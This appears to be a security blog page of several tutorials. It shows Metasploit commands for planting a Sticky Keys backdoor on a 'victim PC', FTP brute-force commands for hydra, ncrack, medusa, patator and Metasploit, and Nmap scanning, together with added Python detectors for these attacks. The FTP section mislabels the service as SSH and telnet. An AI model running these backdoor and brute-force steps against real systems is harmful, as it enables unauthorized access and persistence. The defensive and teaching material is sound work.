Showing posts with label Hacking Tools.

Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter

This bash script tests for Sticky Keys and Utilman backdoors. The script connects to an RDP server, sends both the Sticky Keys and Utilman triggers, and screenshots the result.

How does it work?

· Connects to RDP using rdesktop
· Sends Shift 5 times using xdotool to trigger sethc.exe backdoors
· Sends Windows+U using xdotool to trigger utilman.exe backdoors
· Takes a screenshot
· Kills the RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session, enable the Remote Desktop option on the remote PC using the following post module:

msf > use post/windows/manage/enable_rdp
msf post(enable_rdp) > set session 2
msf post(enable_rdp) > exploit


In the next step, replace the Sticky Keys binary with a command prompt using the following post module:
msf > use post/windows/manage/sticky_keys
msf post(sticky_keys) > set session 2
msf post(sticky_keys) > exploit


Now clone the Sticky Keys Hunter repository from GitHub; to do so, type:



To scan a single host: ./stickyKeysHunter.sh 192.168.0.120


Now a pop-up will open like the one below.


Now press the Shift key 5 times at the login screen; a command prompt will open up.


Now you can run commands on the victim PC through the command prompt. I am using the net user command to see the list of accounts.
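The backdoor this post plants (Shift pressed 5 times or Windows+U launching cmd.exe from the logon screen) is also cheap for a defender to check for. The following Python is an added example, not part of the original post or of Sticky Keys Hunter: it flags an accessibility binary whose hash equals that of cmd.exe (the file-replacement variant) and any Debugger value set on sethc.exe or utilman.exe under the Image File Execution Options key (the registry variant). The System32 directory and registry export it checks here are constructed stand-ins; on a real host you would point it at C:\Windows\System32 and feed it the exported IFEO subkeys.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path

# Accessibility helpers reachable from the logon screen (Shift x5, Win+U).
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe")


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_replaced_binaries(system32):
    """Return accessibility binaries whose contents equal cmd.exe.
    A sethc.exe or utilman.exe identical to cmd.exe is the file-replacement
    variant of the backdoor; both should normally differ from cmd.exe."""
    system32 = Path(system32)
    cmd_hash = sha256_of(system32 / "cmd.exe")
    return [name for name in ACCESSIBILITY_BINARIES
            if (system32 / name).is_file()
            and sha256_of(system32 / name) == cmd_hash]


def find_ifeo_debuggers(ifeo_entries):
    """ifeo_entries maps subkey names under the Image File Execution Options
    key to their Debugger value (export them with reg query or winreg).
    The registry variant sets a Debugger on sethc.exe or utilman.exe so the
    debugger (cmd.exe) starts instead; any such Debugger is reported."""
    return {name: dbg for name, dbg in ifeo_entries.items()
            if name.lower() in ACCESSIBILITY_BINARIES and dbg}


def build_demo_system32():
    """Constructed stand-in for System32 (not real Windows files): a fake
    cmd.exe copied over sethc.exe, and an untouched utilman.exe."""
    d = Path(tempfile.mkdtemp())
    (d / "cmd.exe").write_bytes(b"MZ constructed cmd.exe")
    shutil.copy(d / "cmd.exe", d / "sethc.exe")
    (d / "utilman.exe").write_bytes(b"MZ constructed utilman.exe")
    return d


if __name__ == "__main__":
    print(find_replaced_binaries(build_demo_system32()))   # ['sethc.exe']
    # Constructed registry export: one backdoored entry, one unrelated entry.
    print(find_ifeo_debuggers({"sethc.exe": r"C:\Windows\System32\cmd.exe",
                               "notepad.exe": ""}))
```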

Detect Vulnerability Scanner in Network using KFSensor

In the previous article, we saw how the KFSensor Honeypot IDS detects an unauthorized person by simulating vulnerable system services. To a hacker, a vulnerability is like a jewel. The first phase of hacking is footprinting and the second is scanning, where the attacker learns whether a system is vulnerable to an attack or not. So in this article, we will detect an unauthorized person or hacker at the scanning stage and stop them.

Install and start the KFSensor Honeypot IDS server; to do this, read my previous article.

Here my KFSensor Honeypot is ready.


The scanning phase tells us whether a system is vulnerable or not and sometimes even provides information about exploits available for that vulnerability, so every hacker performs this step before exploiting your system. Here I try to scan my system running KFSensor with the Nessus vulnerability scanner from another computer.


As you can see, Nessus has started scanning my system and finding vulnerabilities.


Here you can see that the KFSensor Honeypot IDS alerted you that someone is trying to scan your system for vulnerabilities, that some of the packets your system is receiving are malicious, and that it recorded the attacker's IP address.


Now I’m also trying to scan my system with GFI LanGuard to see whether KFSensor IDS detects it or not.


GFI LanGuard has started scanning.


Here the KFSensor Honeypot IDS alerted that someone is sending packets to find vulnerabilities in the system. Here you can monitor attacks on every TCP and UDP port; you can even see ICMP (ping) messages.


Here you can see that someone is attacking a port and that their IP address is 192.168.149.1.


You can also view alerts by visitor, meaning which IP address is trying to access which ports.



The KFSensor Honeypot IDS can also detect whether or not someone is using a vulnerability scanner to attack your system. Now we know that a particular IP address is sending too many packets, which is not good. To block that IP address we have to create a separate policy for that visitor. To do that, double-click on the IP address you want to block from accessing your system and a menu will appear.


Now click on Details.




Here click on Create Visitor Rule to create a policy. After that, select the port you want to block for that IP address and select the action: Close or Ignore all requests from that particular IP address.
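What KFSensor is doing when it attributes those packets to 192.168.149.1 is, at bottom, counting how many distinct ports one visitor probes in a short time. As an added example (not KFSensor's own code or log format), this Python applies that rule to a constructed list of honeypot connection events: a visitor that touches 10 or more distinct ports within 60 seconds is reported as a scanner, which is the address you would then cover with a Create Visitor Rule. The event tuples, addresses and thresholds are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def sample_events():
    """Constructed honeypot connection events (not a KFSensor export):
    (timestamp, visitor ip, protocol, destination port). One visitor
    sweeps ports 1-30 in 15 seconds; one client only ever uses port 80."""
    t0 = datetime(2019, 6, 10, 10, 0, 0)
    sweep = [(t0 + timedelta(seconds=i // 2), "192.168.149.1", "TCP", port)
             for i, port in enumerate(range(1, 31))]
    client = [(t0 + timedelta(minutes=m), "192.168.149.20", "TCP", 80)
              for m in range(5)]
    return sweep + client


def find_scanners(events, window=timedelta(seconds=60), min_ports=10):
    """Flag visitors that touch at least `min_ports` distinct (protocol,
    port) pairs within any `window`. A legitimate client talks to one or
    two services; a vulnerability scanner such as Nessus or LanGuard walks
    through many ports in seconds. Returns {ip: sorted list of ports hit}."""
    by_ip = defaultdict(list)
    for ts, ip, proto, port in events:
        by_ip[ip].append((ts, (proto, port)))
    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Drop events from the left until the span fits in `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            distinct = {svc for _, svc in hits[start:end + 1]}
            if len(distinct) >= min_ports:
                flagged[ip] = sorted(p for _, p in {svc for _, svc in hits})
                break
    return flagged


if __name__ == "__main__":
    print(find_scanners(sample_events()))   # only 192.168.149.1 is reported
```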

Vulnerability Scanning in Network using Retina

Retina is a network vulnerability scanner, one of the industry’s most powerful and effective. This network scanning tool gives a pretty good vulnerability assessment experience and generates a full yet concise network vulnerability report.

So let’s see how to do network vulnerability scanning.


Open the Retina vulnerability scanner. In the Audit section, click on Targets and select the target type: you can select a single IP or give a range of IPs; in my case I’m scanning a single IP. Now give a file name and a job name of your choice.


Now click on Ports in the left section, select the type of port group you want to include in your scan, and click on Modify.


Now click on Audits in the left section and select the type you want to scan for.


Now go to the Options section and select the type of information you want to gather, like NetBIOS name, DNS address, etc.

Now go to the Credentials section, select your type, and finally click on Scan.

Now Retina will start scanning your network according to your settings.


After a few minutes your vulnerability scan will complete.


Now go to the Remediate section; here you can select what you want to include in your vulnerability report.


Now in the Report section you can select what type of report you want to generate for your network penetration test. Select the type of report according to your need from the Report Type menu and click on the Generate button.



After that you have two options to view your report: either through Internet Explorer or Microsoft Word. Click on the Internet Explorer icon. Now you can see that the Retina network vulnerability scanner created a thorough vulnerability report explaining each and every vulnerability in the network.


6 Ways to Hack FTP Login Password


In this article, we will learn how to gain control over our victim's PC through the SSH port. There are various ways to do it; let's take the time to learn all of them, because different circumstances call for different measures.

Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command:

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ftp

-L: path to the username list
-P: path to the password list
Once the command is executed it will start the dictionary attack, and you will have the right username and password in no time. As you can observe, we successfully grabbed the telnet username pavan and the password toor.




xHydra

This is the graphical version of Hydra, used to apply a dictionary attack via the FTP port to hack a system. For this method to work:

Open xHydra in Kali, select the Single Target option, and enter the IP of your victim PC there. Then select FTP in the box next to the Protocol option and give port number 21 next to the Port option.




Now go to the Passwords tab, select Username List, and give the path of the text file containing your usernames in the box adjacent to it.

Then select Password List and give the path of the text file containing all the passwords in the box adjacent to it.




After doing this, go to the Start tab and click on the Start button on the left. Now the dictionary attack will start, and you will obtain the username and password of your victim.




Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command:

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103:21

Here:
-v: verbose output
-U: path to the username list
-P: path to the password list
As you can observe, we successfully grabbed the telnet username pavan and the password toor.




Medusa

Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.
Run the following command:
medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ftp

Here:
-h: target host
-U: path to the username list
-P: path to the password list
-M: module (protocol) to use
As you can observe, we successfully grabbed the telnet username pavan and the password toor.




Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is quite useful for brute-force attacks against several services such as FTP, HTTP, SMB, etc.
Run the following command:
patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt




From the image given below you can observe that the dictionary attack starts, and thus you will obtain the username and password of your victim.




Metasploit

This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

Open a Kali terminal and type msfconsole, then:
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set rhosts 192.168.1.103 (IP of Remote Host)
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(ftp_login) > set stop_on_success true
msf auxiliary(ftp_login) > exploit

From the image given below you can observe that we successfully grabbed the FTP username and password.
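Every tool above leaves the same artefact on the FTP server: a burst of failed logins from one client, sometimes followed by a success. As an added example, not from the original post or from any of the tools it covers, this Python parses a constructed vsftpd-style log excerpt and flags a client with 5 or more FAIL LOGIN lines inside 60 seconds, reporting any OK LOGIN that follows as a probably guessed credential. The log lines, addresses, user names and thresholds are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed vsftpd-style excerpt: the line layout is vsftpd's, but the
# timestamps, user names and addresses are invented for this example.
SAMPLE_LOG = """\
Mon Jun 10 10:00:01 2019 [pid 2481] [pavan] FAIL LOGIN: Client "192.168.1.50"
Mon Jun 10 10:00:01 2019 [pid 2483] [pavan] FAIL LOGIN: Client "192.168.1.50"
Mon Jun 10 10:00:02 2019 [pid 2485] [pavan] FAIL LOGIN: Client "192.168.1.50"
Mon Jun 10 10:00:02 2019 [pid 2487] [pavan] FAIL LOGIN: Client "192.168.1.50"
Mon Jun 10 10:00:03 2019 [pid 2489] [pavan] FAIL LOGIN: Client "192.168.1.50"
Mon Jun 10 10:00:03 2019 [pid 2491] [pavan] OK LOGIN: Client "192.168.1.50"
Mon Jun 10 10:30:00 2019 [pid 2600] [alice] FAIL LOGIN: Client "192.168.1.77"
Mon Jun 10 10:30:20 2019 [pid 2602] [alice] OK LOGIN: Client "192.168.1.77"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[\d.]+)"')


def parse_log(text):
    """Yield (timestamp, client ip, user, OK|FAIL) for each login line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["ip"], m["user"], m["result"]


def detect_dictionary_attacks(records, window=timedelta(seconds=60), threshold=5):
    """Flag a client once it has `threshold` failures inside `window` (the
    burst hydra/ncrack/medusa produce); a later OK is a guessed credential."""
    recent = defaultdict(list)   # ip -> failure timestamps still in window
    alerts = {}
    for ts, ip, user, result in sorted(records):
        if result == "FAIL":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.pop(0)
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "guessed": []})
                a["failures"] = max(a["failures"], len(q))
        elif ip in alerts and user not in alerts[ip]["guessed"]:
            alerts[ip]["guessed"].append(user)
    return alerts


if __name__ == "__main__":
    print(detect_dictionary_attacks(parse_log(SAMPLE_LOG)))
```

Only the 192.168.1.50 burst is reported; alice's single typo from 192.168.1.77 stays below the threshold.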


Network Scanning using NMAP (Beginner Guide)

Basic Scanning Techniques

Here I will show the basic techniques for scanning a network or host. But before that, you should know some basics about the port states Nmap reports after scanning.
Port Status: after scanning, you may see results with a port state like filtered, open, closed, etc. Let me explain these.

· Open: This indicates that an application is listening for connections on this port.
· Closed: This indicates that the probes were received but there is no application listening on this port.
· Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering.
· Unfiltered: This indicates that the probes were received but a state could not be established.
· Open/Filtered: This indicates that the port was filtered or open but Nmap couldn’t establish the state.
· Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn’t establish the state.

Open a Kali Linux terminal and type nmap to see all Nmap commands.

Find All Connected PC (Ping Scan)

The -sP option performs a ping-only scan. It is most useful when you have a group of IP addresses and you don’t know which ones are reachable.

nmap -sP -T4 192.168.0.1/24

Note: -T sets the timing template (speed) of the scan; a slower scan yields better results.


Multiple IP Scan

nmap -sn 192.168.0.1/24


TCP Ports Scan

TCP connect scan is the default TCP scan type when SYN scan is not an option. It will show you all open TCP ports on the remote PC.

Single IP Scan
nmap -sT 192.168.0.102


Multiple IP Scan

nmap -sT 192.168.0.1/24


Detect Service Version

In this scan you can find the version of the service running on each open port. This is done using multiple techniques like banner grabbing, reading server headers, and sending specific requests.

Single Host Service Scanning

nmap -sV 192.168.0.102


Multiple Hosts Scanning

nmap -sV -T4 192.168.0.1/24


Detect Operating System

In this scan you can find the operating system installed on a PC in the network.

Single Host Scanning

nmap -O 192.168.0.102


Multiple Hosts Scanning

nmap -O -T4 192.168.0.1/24



Detect Protocol

This scan lists the IP protocols the network PC responds to, shown as PROTOCOL, STATE and SERVICE.

nmap -sO -T4 192.168.0.1/24


Aggressive Scan (Also Works for Traceroute)

For Single Host

The aggressive scan selects the most commonly used options; it is a simple alternative to writing long option strings. It also runs a traceroute, etc.

nmap -A 192.168.0.102


Multiple Hosts Scanning

nmap -A -T4 192.168.0.1/24


UDP Ping Scan

The UDP scan sends UDP probes only to the target. It will show you all open UDP ports on the remote PC.

nmap -sU -T4 192.168.0.102


SYN Scan

It completes only 2 steps of the 3-way handshake. No chance of closing or crashing the target, and it goes undetected by older systems. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls.

nmap -sS 192.168.0.113